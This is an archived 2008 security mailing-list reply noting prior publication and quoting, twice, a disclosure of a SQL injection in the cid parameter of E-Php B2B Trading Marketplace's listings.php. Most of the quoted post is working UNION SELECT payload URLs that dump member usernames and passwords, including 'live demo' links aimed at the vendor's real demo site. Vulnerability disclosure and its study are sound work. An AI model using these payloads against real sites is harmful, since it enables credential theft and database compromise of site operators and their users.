Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Already discovered:

http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. &nbsp;Homepage: <a href="http://www.darkc0de.com/"; target="ext">http://www.darkc0de.com/.</a>  Authored By <a href="mailto:r45c4l[at]hotmail.com";>r45c4l</a>

On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote:
> |___________________________________________________|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___________________________________________________
> |---------------------Hussin X----------------------|
> |
> |    Author: Hussin X
> |
> |    Home :  WwW.Hussin-X.CoM <http://www.hussin-x.com/>  |  www.tryag.cc/cc
> |
> |    email:  darkangel_g85[at]Yahoo[DoT]com
> |
> |
> |
> |___________________________________________________
> |                                                   |
> |
> | script : http://www.ephpscripts.com
> |
> |___________________________________________________|
> 
> Exploit:
> 
> 
> 
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> L!VE DEMO: :
> 
> INFO
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members
> --
> 
> 
> 
> 
> 
> 
> 
> ____________________________( Greetz )_________________________________
> |
> |    All members of the Forum  WwW.Hussin-X.CoM <http://www.hussin-x.com/> |
> WwW.TrYaG.CC <http://www.tryag.cc/>
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
> |
> |  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |______________________________________________________________________
> 
> 
>                              Im IRAQi

> |___________________________________________________|
> |
> | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
> |
> |___________________________________________________
> |---------------------Hussin X----------------------|
> |
> |    Author: Hussin X
> |
> |    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
> |
> |    email:  darkangel_g85[at]Yahoo[DoT]com
> |
> |
> |
> |___________________________________________________
> |                                                   |
> |
> | script : http://www.ephpscripts.com
> |
> |___________________________________________________|
> 
> Exploit:  
> 
> 
> 
> www.[target].com/Script/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members--
> 
> 
> 
> 
> 
> 
> 
> L!VE DEMO: :
> 
> INFO
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members--
> 
> 
> 
> http://www.ephpscripts.com/demo/b2b/listings.php?browse=sell&cid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members--
> 
> 
> 
> 
> 
> 
> 
> ____________________________( Greetz )_________________________________
> |
> |    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
> |
> | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr 
> |   
> |  Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori
> |______________________________________________________________________
>     
> 
>                              Im IRAQi


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux